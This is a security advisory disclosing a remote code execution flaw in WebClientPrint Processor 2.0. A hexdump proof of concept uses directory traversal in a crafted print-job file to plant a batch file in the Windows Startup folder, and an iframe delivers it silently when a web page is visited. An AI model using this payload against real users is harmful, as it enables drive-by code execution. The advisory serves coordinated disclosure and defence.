Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs RedTeam Pentesting discovered that malicious print jobs can be used to trigger a remote code execution vulnerability in WebClientPrint Processor (WCPP). These print jobs may be distributed via specially crafted websites and are processed without any user interaction as soon as the website is accessed. Details ======= Product: Neodynamic WebClientPrint Processor Affected Versions: 2.0.15.109 (Microsoft Windows) Fixed Versions: >= 2.0.15.910 Vulnerability Type: Remote Code Execution Security Risk: high Vendor URL: http://www.neodynamic.com/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-008 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction ============ Neodynamic's WebClientPrint Processor is a client-side application which allows server-side applications to print documents on a client's printer without user interaction, bypassing the browser's print functionality. The server-side application may be written in ASP.NET or PHP while on the client-side multiple platforms and browsers are supported. "Send raw data, text and native commands to client printers without showing or displaying any print dialog box!" (Neodynamic's website) More Details ============ Upon installation under Microsoft Windows, WCPP registers itself as a handler for the "webclientprint" URL scheme. Thus, any URL starting with "webclientprint:" is handled by WCPP. For example, entering webclientprint:-about in the URL bar of a browser opens the about box of WCPP. In order to automatically print a text file using WCPP, a URL such as the following is requested (e.g. via JavaScript code or an iframe HTML tag in a website): webclientprint:https://example.com/somedir/lorem.txt The file lorem.txt conforms to Neodynamic's proprietary file format CPJ and contains the following data: ----------------------------------------------------------------------- $ xxd lorem.txt 00000000: 6370 6a02 fc0b 0000 070c 0000 7763 7050 cpj.........wcpP 00000010: 463a 6632 3330 6262 3766 3965 3338 3437 F:f230bb7f9e3847 00000020: 3633 6132 3765 6663 3565 6237 6633 6436 63a27efc5eb7f3d6 00000030: 6661 2e54 5854 7c50 7269 6e74 6564 2042 fa.TXT|Printed B 00000040: 7920 5765 6243 6c69 656e 7450 7269 6e74 y WebClientPrint 00000050: 0d0a 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d ..============== 00000060: 3d3d 3d3d 3d3d 3d3d 3d3d 3d0d 0a0d 0a4c ===========....L 00000070: 6f72 656d 2069 7073 756d 2064 6f6c 6f72 orem ipsum dolor 00000080: 2073 6974 2061 6d65 742c 2063 6f6e 7365 sit amet, conse 00000090: 6374 6574 7572 2061 6469 7069 7363 696e ctetur adipiscin 000000a0: 6720 656c 6974 2e20 4675 7363 6520 7572 g elit. Fusce ur [...] 00000bc0: 6275 6c75 6d20 7675 6c70 7574 6174 6520 bulum vulputate 00000bd0: 6d61 676e 6120 6772 6176 6964 6120 6e65 magna gravida ne 00000be0: 7175 6520 696d 7065 7264 6965 7420 6163 que imperdiet ac 00000bf0: 2076 6976 6572 7261 206e 756c 6c61 2073 viverra nulla s 00000c00: 7573 6369 7069 742e 0150 4446 4372 6561 uscipit..PDFCrea 00000c10: 746f 7241 636f 7069 616e 2054 6563 686e torAcopian Techn 00000c20: 6963 616c 2043 6f6d 7061 6e79 202d 2031 ical Company - 1 00000c30: 2057 6562 4170 7020 4c69 6320 2d20 3220 WebApp Lic - 2 00000c40: 5765 6253 6572 7665 7220 4c69 637c xxxx WebServer Lic|xx 00000c50: xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxxxxxxxxxxxxxx 00000c60: xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxxxxxxxxxxxxxx 00000c70: xxxx xxxx xxxx xxxxxx ----------------------------------------------------------------------- It was obtained from Neodynamic's online demo website[0]. Briefly, its structure can be described as follows: Offset Size Usage ----------------------------------------------------------------------- 0 3 magic bytes "cpj" 3 1 unknown 4 4 offset "pc" (32 bit LE) for printer configuration 8 4 offset "lk" (32 bit LE) for license key 0x0c 6 filename/content header "wcpPF:" 0x12 - filename and content separated by pipe ("|") character pc+0x12 - printer configuration lk+0x12 - license key In the example above, the file "f230bb7f9e384763a27efc5eb7f3d6fa.TXT" would be printed on the printer with the name "PDFCreator". The license key at the end of the file was intentionally redacted. Prior to printing, the text file with the dummy content is created in the current user's %TEMP% directory. Typically, this directory is located at: C:\Users\<user>\AppData\Local\Temp\ Proof of Concept ================ During RedTeam Pentesting's analysis of WCPP it was found that malicious CPJ files can be crafted that exploit a directory traversal bug in WCPP. Such an example is given in the following hexdump, showing the file rce-user.txt: ----------------------------------------------------------------------- $ xxd rce-user.txt 00000000: 6370 6a02 0201 0000 0301 0000 7763 7050 cpj.........wcpP 00000010: 463a 2e2e 5c2e 2e5c 526f 616d 696e 675c F:..\..\Roaming\ 00000020: 4d69 6372 6f73 6f66 745c 5769 6e64 6f77 Microsoft\Window 00000030: 735c 5374 6172 7420 4d65 6e75 5c50 726f s\Start Menu\Pro 00000040: 6772 616d 735c 5374 6172 7475 705c 5265 grams\Startup\Re 00000050: 6454 6561 6d2e 6261 747c 4065 6368 6f20 dTeam.bat|@echo 00000060: 6f66 660d 0a63 6c73 0d0a 6563 686f 2e0d off..cls..echo.. 00000070: 0a65 6368 6f20 5072 6f6f 662d 6f66 2d43 .echo Proof-of-C 00000080: 6f6e 6365 7074 0d0a 6563 686f 202d 2d2d oncept..echo --- 00000090: 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d0d 0a65 -------------..e 000000a0: 6368 6f20 5265 6d6f 7465 2043 6f64 6520 cho Remote Code 000000b0: 4578 6563 7574 696f 6e20 7669 6120 5765 Execution via We 000000c0: 6243 6c69 656e 7450 7269 6e74 2076 322e bClientPrint v2. 000000d0: 302e 3135 2e31 3039 0d0a 464f 5220 2f4c 0.15.109..FOR /L 000000e0: 2025 2578 2049 4e20 2831 2c31 2c31 3829 %%x IN (1,1,18) 000000f0: 2044 4f20 6563 686f 2e0d 0a73 7461 7274 DO echo...start 00000100: 2063 616c 630d 0a70 6175 7365 0d0a 007c calc..pause...| ----------------------------------------------------------------------- In this example the filename is set to ..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat which is appended to the %TEMP% directory as follows: C:\Users\<user>\AppData\Local\Temp\..\..\Roaming\Microsoft\Windows\ Start Menu\Programs\Startup\RedTeam.bat After resolving the "..\..\" sequence contained in the filename, this yields the following path: C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Startup\RedTeam.bat As a consequence, the file content beginning at 0x5a is written to the file RedTeam.bat in the current user's Startup folder. Therefore, RedTeam.bat will be executed once the affected user logs in again. As a proof of concept, a text will be displayed and Windows' calculator is executed. On one hand, this exploit can be executed when the following URL is entered into the URL bar of a browser: webclientprint:https://example.com/somedir/rce-user.txt On the other hand, visiting users of a malicious website may be attacked without user interaction when the webclientprint URL is embedded into an iframe as follows: ----------------------------------------------------------------------- <html> <body> <iframe src="webclientprint:https://example.com/somedir/rce-user.txt"> </iframe> </body> </html> ----------------------------------------------------------------------- The proof of concept printed above contains no valid license key, so a notification window is shown when the exploit is executed. However, this does not prevent successful exploitation. Attackers can easily add a valid license key (e.g. by buying a license), so the window is not shown and there is no visual indication of exploitation anymore. The proof of concept is designed to print using the default printer. Since WCPP does not seem to know how to print batch files, it exits silently with the result that a successful attack does not print the batch file. Workaround ========== Affected users should disable the WCPP handler and upgrade to a fixed version as soon as possible. Fix === Install a WCPP version greater or equal to 2.0.15.910[1]. Security Risk ============= If a user of WCPP visits an attacker-controlled website, arbitrary code can be executed on the attacked user's computer. If a valid license key is provided, there is no visual indication of the ongoing attack. Furthermore, no user interaction is required to trigger the vulnerability once a malicious website is visited. It is therefore estimated that this vulnerability poses a high risk. Timeline ======== 2015-08-24 Vulnerability identified 2015-09-03 Customer approved disclosure to vendor 2015-09-04 Asked vendor for security contact 2015-09-04 CVE number requested 2015-09-04 Vendor responded with security contact 2015-09-07 Vendor notified 2015-09-07 Vendor acknowledged receipt of advisory 2015-09-15 Vendor released fixed version 2015-09-16 Customer asked to wait with advisory release until all their clients are updated 2017-07-31 Customer approved advisory release 2017-08-22 Advisory released References ========== [0] http://webclientprint.azurewebsites.net/ [1] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
Attachment:
pgpG1R9rcnczR.pgp
Description: PGP signature